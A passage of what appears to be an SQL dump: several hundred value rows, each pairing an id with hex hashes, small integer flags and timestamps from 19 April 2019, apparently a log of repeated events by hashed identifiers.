(80263, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 17:37:27'),
(80264, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 17:37:40'),
(80265, '4606ef3f7e9e160b4c7ea1ae39880bf5', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-19 17:37:57'),
(80266, '3db39c5bfce217b550e4b392bf5548b5', '269602a3a196c858', 0, 2, 1, '2019-04-19 17:38:06'),
(80267, '4cca16ad5591afa0536b74c48c409401', 'e567435cac654a90', 0, 2, 1, '2019-04-19 17:38:12'),
(80268, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 17:38:21'),
(80269, '3db39c5bfce217b550e4b392bf5548b5', '269602a3a196c858', 0, 2, 1, '2019-04-19 17:38:23'),
(80270, '91d17e73f9a9b77bf2a2c9258ccf59b2', '3d1dceaf0c765f9c', 0, 2, 1, '2019-04-19 17:38:33'),
(80271, 'b5e9a2658dd9e57baf0b654bd55d23e3', 'ea53da44eed2f332', 0, 2, 1, '2019-04-19 17:38:36'),
(80272, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 17:38:39'),
(80273, '407667a3dc888ec791632c41d5b05544', '22f43a16a511f701', 0, 2, 1, '2019-04-19 17:38:40'),
(80274, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:38:53'),
(80275, 'e0dd8abe7659589ab61c48f121ce357a', '0b797fb53ae15810', 0, 2, 1, '2019-04-19 17:39:04'),
(80276, '06a8432d82c2b03c950390c1bc8e31c6', 'ef135ae455c933ae', 0, 2, 1, '2019-04-19 17:39:07'),
(80277, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:39:23'),
(80278, '698700eabccf051dfe8483ceb1c28277', '276e6c253282b236', 0, 2, 1, '2019-04-19 17:39:25'),
(80279, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 17:39:31'),
(80280, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 17:39:43'),
(80281, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:39:44'),
(80282, 'e4a33130712ccaf18b948eec4002986b', 'e50451d6d332bac5', 0, 2, 1, '2019-04-19 17:39:58'),
(80283, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:40:01'),
(80284, '3aaaf1a085fe36f0da79aa616efb5e93', '0315a9e8bb354f60', 0, 2, 1, '2019-04-19 17:40:22'),
(80285, '3d8190794247dff28eb463771e43e59e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-19 17:40:42'),
(80286, 'cf6a2dbfca18ca0bf412b92a55e3c7a7', 'ca550072d9c923a1', 0, 2, 1, '2019-04-19 17:41:16'),
(80287, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:41:30'),
(80288, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 17:41:34'),
(80289, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:41:47'),
(80290, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 17:42:06'),
(80291, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:42:15'),
(80292, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 17:42:25'),
(80293, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:42:30'),
(80294, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:43:00'),
(80295, '1cc0f35e743b32565c966d1c0ae4d360', 'e996039688368fa6', 0, 2, 1, '2019-04-19 17:43:07'),
(80296, '1cc0f35e743b32565c966d1c0ae4d360', 'e996039688368fa6', 0, 2, 1, '2019-04-19 17:43:56'),
(80297, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:44:04'),
(80298, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 17:44:13'),
(80299, '698700eabccf051dfe8483ceb1c28277', '276e6c253282b236', 0, 2, 1, '2019-04-19 17:44:38'),
(80300, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 17:44:42'),
(80301, '4af320651c0197c14bfff060c643b990', '3f487fdbfc9b63c7', 0, 2, 1, '2019-04-19 17:44:44'),
(80302, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:44:45'),
(80303, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 17:44:49'),
(80304, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 17:44:50'),
(80305, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-19 17:44:51'),
(80306, '88e8d671bd6df95042b135daf38afbf3', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 17:44:53'),
(80307, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:45:03'),
(80308, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:45:08'),
(80309, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 17:45:10'),
(80310, '88e8d671bd6df95042b135daf38afbf3', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 17:45:22'),
(80311, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 17:45:26'),
(80312, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:45:29'),
(80313, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 17:45:35'),
(80314, '4cca16ad5591afa0536b74c48c409401', 'e567435cac654a90', 0, 2, 1, '2019-04-19 17:45:36'),
(80315, 'ce800b3b120e0d3978f47097fb66526c', 'b9974a919762d897', 0, 2, 1, '2019-04-19 17:45:40'),
(80316, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:45:42'),
(80317, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 17:45:48'),
(80318, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 17:45:52'),
(80319, '4c8a6e27a57a3aa34660834183bad026', '135f23c8a85974ba', 0, 2, 1, '2019-04-19 17:45:55'),
(80320, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 17:45:59'),
(80321, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:46:07'),
(80322, '88e8d671bd6df95042b135daf38afbf3', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 17:46:14'),
(80323, 'c6523184656d4f9516110e00bf55fa99', '0315a9e8bb354f60', 0, 2, 1, '2019-04-19 17:46:17'),
(80324, 'ff8b805c0c789e866f91e8b3f6b68282', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-19 17:46:17'),
(80325, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 17:46:25'),
(80326, '4cca16ad5591afa0536b74c48c409401', 'e567435cac654a90', 0, 2, 1, '2019-04-19 17:46:28'),
(80327, '1cc0f35e743b32565c966d1c0ae4d360', 'e996039688368fa6', 0, 2, 1, '2019-04-19 17:46:45'),
(80328, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 17:47:07'),
(80329, '5b003235e10284240860d969bdb9bcc0', '4f982be25b54b0e8', 0, 2, 1, '2019-04-19 17:47:19'),
(80330, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:47:24'),
(80331, '5b003235e10284240860d969bdb9bcc0', '4f982be25b54b0e8', 0, 2, 1, '2019-04-19 17:47:36'),
(80332, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:47:38'),
(80333, 'e4a33130712ccaf18b948eec4002986b', 'e50451d6d332bac5', 0, 2, 1, '2019-04-19 17:47:41'),
(80334, '82e0d7075d84bb7a655050de2d2ecd69', '0b1466b4de9b8a16', 0, 2, 1, '2019-04-19 17:47:41'),
(80335, 'c27cf9fb6712ff5118c229d521082b0a', 'e034e39546e57033', 0, 2, 1, '2019-04-19 17:48:30'),
(80336, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:48:34'),
(80337, '82e0d7075d84bb7a655050de2d2ecd69', '0b1466b4de9b8a16', 0, 2, 1, '2019-04-19 17:48:36'),
(80338, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-04-19 17:48:46'),
(80339, '06a8432d82c2b03c950390c1bc8e31c6', 'ef135ae455c933ae', 0, 2, 1, '2019-04-19 17:49:07'),
(80340, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 17:49:37'),
(80341, '5841c2a4475a7f444fefcada655605f0', 'bd11923b68f239af', 0, 2, 1, '2019-04-19 17:49:38'),
(80342, '11f41f4aaad19af3597d979febb90197', '786e1010a10a45e4', 0, 2, 1, '2019-04-19 17:49:43'),
(80343, 'c637f7f2ae78cfefc1e20003cb74dfa3', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-19 17:49:45'),
(80344, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 17:50:17'),
(80345, 'b48798695a43b7bdadaa50db435d903e', '2622b37d94f09b78', 0, 2, 1, '2019-04-19 17:50:30'),
(80346, '4af320651c0197c14bfff060c643b990', '3f487fdbfc9b63c7', 0, 2, 1, '2019-04-19 17:50:41'),
(80347, '05779725fc6ccb495a73c840954012c2', '4ce11c591dee2703', 0, 2, 1, '2019-04-19 17:51:19'),
(80348, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:51:37'),
(80349, '13d4899e271711fee5c0c8e749dbed99', 'c557ab079a3f6a13', 0, 2, 1, '2019-04-19 17:51:41'),
(80350, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 17:51:54'),
(80351, '13d4899e271711fee5c0c8e749dbed99', 'c557ab079a3f6a13', 0, 2, 1, '2019-04-19 17:52:06'),
(80352, '3f395593ac998200e47c090826ed8cf1', 'edfe950d47379572', 0, 2, 1, '2019-04-19 17:52:21'),
(80353, '62468473fba7a6a62917c313d99d8ebb', '0d6d214e577e9800', 0, 2, 1, '2019-04-19 17:52:22'),
(80354, '62468473fba7a6a62917c313d99d8ebb', '0d6d214e577e9800', 0, 2, 1, '2019-04-19 17:52:25'),
(80355, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:54:24'),
(80356, 'c6523184656d4f9516110e00bf55fa99', '0315a9e8bb354f60', 0, 2, 1, '2019-04-19 17:54:27'),
(80357, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:54:57'),
(80358, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 17:55:50'),
(80359, '028563aa67fd38ac0bcfab97801675f5', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 17:55:53'),
(80360, '028563aa67fd38ac0bcfab97801675f5', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 17:55:56'),
(80361, '4606ef3f7e9e160b4c7ea1ae39880bf5', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-19 17:56:00'),
(80362, '4f6da1dfaf8f5c505061570462039ecb', '939fbcee39b8c410', 0, 2, 1, '2019-04-19 17:56:02'),
(80363, '028563aa67fd38ac0bcfab97801675f5', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 17:56:06'),
(80364, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 17:56:08'),
(80365, '4c8a6e27a57a3aa34660834183bad026', '135f23c8a85974ba', 0, 2, 1, '2019-04-19 17:56:10'),
(80366, '1cc0f35e743b32565c966d1c0ae4d360', 'e996039688368fa6', 0, 2, 1, '2019-04-19 17:56:15'),
(80367, '4f6da1dfaf8f5c505061570462039ecb', '939fbcee39b8c410', 0, 2, 1, '2019-04-19 17:56:23'),
(80368, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:56:25'),
(80369, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 17:56:25'),
(80370, '36879879bdf8044f156c543196d468f3', '863b661787591b2d', 0, 2, 1, '2019-04-19 17:56:44'),
(80371, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 17:56:45'),
(80372, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 17:56:46'),
(80373, 'e77c9ad75ec91e65a08565496daea74e', 'dfba073a5712f69a', 0, 2, 1, '2019-04-19 17:57:06'),
(80374, 'f13e065e001328de4c8a323ade907d65', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-19 17:57:10'),
(80375, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 17:57:17'),
(80376, '762d15fbe033393a76b9446f46934877', '1de090ec808c88cc', 0, 2, 1, '2019-04-19 17:57:29'),
(80377, 'e77c9ad75ec91e65a08565496daea74e', 'dfba073a5712f69a', 0, 2, 1, '2019-04-19 17:57:35'),
(80378, '250fae80de61d8e25152302b72e5513c', '5716bfdec5db86c3', 0, 2, 1, '2019-04-19 17:57:36'),
(80379, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 17:58:20'),
(80380, '34bc419b628d353eee5ad1c6827c425d', '898b6b7ce7bb8d1d', 0, 2, 1, '2019-04-19 17:59:36'),
(80381, '7a8846dc865723b7f4813ea7f542e6d1', 'f437dce12a08715f', 0, 2, 1, '2019-04-19 18:00:27'),
(80382, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 18:01:50'),
(80383, '9470527cecb0b3406ff8ce7fc1e0d480', '402692e46d0378b1', 0, 2, 1, '2019-04-19 18:03:56'),
(80384, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:05:19'),
(80385, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:05:29'),
(80386, '639d8a6f076dcc54f6ef35b11750ba7f', '950b5ba9e2f5ef23', 0, 2, 1, '2019-04-19 18:05:37'),
(80387, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 18:06:49'),
(80388, '4f6da1dfaf8f5c505061570462039ecb', '939fbcee39b8c410', 0, 2, 1, '2019-04-19 18:08:49'),
(80389, 'ac0415812c312f620ed20796d48f77b9', '017e53ba57d5ea05', 0, 2, 1, '2019-04-19 18:09:24'),
(80390, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:09:29'),
(80391, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:10:40'),
(80392, '028563aa67fd38ac0bcfab97801675f5', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 18:11:46'),
(80393, 'c2fa5669280855ab8de329b1b970e05b', '87f2e25ccc67881b', 0, 2, 1, '2019-04-19 18:12:50'),
(80394, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 18:14:35'),
(80395, '52885af809f783151b0bfaf080a1a3ae', 'b50d65df97c0251e', 0, 2, 1, '2019-04-19 18:16:36'),
(80396, 'c9f80726f4d31d87308ed7f45153a6dd', 'f10990f26adcd1c5', 0, 2, 1, '2019-04-19 18:17:20'),
(80397, '2f9812d66e13e0dad260dff1f63cd29a', '66a36e20632e2653', 0, 2, 1, '2019-04-19 18:17:45'),
(80398, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:19:08'),
(80399, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:19:10'),
(80400, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 18:19:13'),
(80401, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:19:18'),
(80402, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:19:19'),
(80403, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:19:26'),
(80404, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:19:46'),
(80405, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 18:19:52'),
(80406, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:19:54'),
(80407, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:19:58'),
(80408, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:20:03'),
(80409, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:20:04'),
(80410, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:20:04'),
(80411, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 18:20:05'),
(80412, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 18:20:08'),
(80413, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 18:20:27'),
(80414, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:20:47'),
(80415, '2f9812d66e13e0dad260dff1f63cd29a', '66a36e20632e2653', 0, 2, 1, '2019-04-19 18:20:56'),
(80416, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 18:21:04'),
(80417, '4af320651c0197c14bfff060c643b990', '3f487fdbfc9b63c7', 0, 2, 1, '2019-04-19 18:21:08'),
(80418, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 18:21:25'),
(80419, 'efa8ed6ef29e6f3d552d1157874c1bd3', '2e2bfa37ea53970a', 0, 2, 1, '2019-04-19 18:21:26'),
(80420, '88e8d671bd6df95042b135daf38afbf3', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 18:22:12'),
(80421, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:22:12'),
(80422, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 18:22:19'),
(80423, 'c2fa5669280855ab8de329b1b970e05b', '87f2e25ccc67881b', 0, 2, 1, '2019-04-19 18:22:41'),
(80424, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 18:23:01'),
(80425, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:23:22'),
(80426, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:23:29'),
(80427, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:23:32'),
(80428, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:23:36'),
(80429, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:23:36'),
(80430, '4af320651c0197c14bfff060c643b990', '3f487fdbfc9b63c7', 0, 2, 1, '2019-04-19 18:23:38'),
(80431, '11f41f4aaad19af3597d979febb90197', '786e1010a10a45e4', 0, 2, 1, '2019-04-19 18:23:39'),
(80432, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:23:41'),
(80433, '65ebd005c3c5b417278a266bc783e9e1', '59bb5978882acfd8', 0, 2, 1, '2019-04-19 18:23:45'),
(80434, 'f0533a40d8a840cf1ef644f6e13328f5', '28fc1ed988ae4f11', 0, 2, 1, '2019-04-19 18:23:52'),
(80435, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 18:24:03'),
(80436, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:24:09'),
(80437, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 18:24:10'),
(80438, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:24:13'),
(80439, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:24:13'),
(80440, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:24:16'),
(80441, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 18:24:17'),
(80442, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:24:26'),
(80443, '52885af809f783151b0bfaf080a1a3ae', 'b50d65df97c0251e', 0, 2, 1, '2019-04-19 18:24:34'),
(80444, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:24:38'),
(80445, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 18:24:45'),
(80446, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:24:50'),
(80447, '5b3973d7c9b5e1448114208e34a1c72a', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-19 18:24:53'),
(80448, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:24:54'),
(80449, 'efa8ed6ef29e6f3d552d1157874c1bd3', '2e2bfa37ea53970a', 0, 2, 1, '2019-04-19 18:24:57'),
(80450, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:25:02'),
(80451, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:25:02'),
(80452, '88e8d671bd6df95042b135daf38afbf3', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-04-19 18:25:09'),
(80453, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:25:11'),
(80454, '11f41f4aaad19af3597d979febb90197', '786e1010a10a45e4', 0, 2, 1, '2019-04-19 18:25:13'),
(80455, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 18:25:16'),
(80456, '691a8be1dbe1d3cb7523071d49c04101', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 18:25:19'),
(80457, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-19 18:25:24'),
(80458, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:25:26'),
(80459, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 18:25:36'),
(80460, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:25:46'),
(80461, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:25:50'),
(80462, '82e0d7075d84bb7a655050de2d2ecd69', '0b1466b4de9b8a16', 0, 2, 1, '2019-04-19 18:25:52'),
(80463, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:25:53'),
(80464, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 18:25:53'),
(80465, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:26:01'),
(80466, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:26:05'),
(80467, '028563aa67fd38ac0bcfab97801675f5', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 18:26:09'),
(80468, 'efa8ed6ef29e6f3d552d1157874c1bd3', '2e2bfa37ea53970a', 0, 2, 1, '2019-04-19 18:26:10'),
(80469, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:26:21'),
(80470, '4606ef3f7e9e160b4c7ea1ae39880bf5', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-19 18:26:25'),
(80471, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 18:26:29'),
(80472, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:26:35'),
(80473, 'f97c24fd5f096cc7fa6971d8ee3b8155', '00cfdd65313a346b', 0, 2, 1, '2019-04-19 18:26:37'),
(80474, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:26:37'),
(80475, '8d276cb6a861d5c1111814a7e5190f4b', 'e06cb8feac14715b', 0, 2, 1, '2019-04-19 18:26:39'),
(80476, '5b3973d7c9b5e1448114208e34a1c72a', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-19 18:26:50'),
(80477, '8d276cb6a861d5c1111814a7e5190f4b', 'e06cb8feac14715b', 0, 2, 1, '2019-04-19 18:26:53'),
(80478, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:26:57'),
(80479, '8d276cb6a861d5c1111814a7e5190f4b', 'e06cb8feac14715b', 0, 2, 1, '2019-04-19 18:27:01'),
(80480, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:27:04'),
(80481, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 18:27:13'),
(80482, 'efa8ed6ef29e6f3d552d1157874c1bd3', '2e2bfa37ea53970a', 0, 2, 1, '2019-04-19 18:27:25'),
(80483, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:27:32'),
(80484, '18351504247c1d951087c90b6e479017', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-19 18:27:34'),
(80485, 'efa8ed6ef29e6f3d552d1157874c1bd3', '2e2bfa37ea53970a', 0, 2, 1, '2019-04-19 18:27:43'),
(80486, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:27:53'),
(80487, '45158a3c314bb83b64aa048160601848', '324d0c5c1f480926', 0, 2, 1, '2019-04-19 18:27:54'),
(80488, '11f41f4aaad19af3597d979febb90197', '786e1010a10a45e4', 0, 2, 1, '2019-04-19 18:27:57'),
(80489, '11f41f4aaad19af3597d979febb90197', '786e1010a10a45e4', 0, 2, 1, '2019-04-19 18:28:08'),
(80490, '698d2cf20912dc7cf49892402768c517', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-19 18:28:14'),
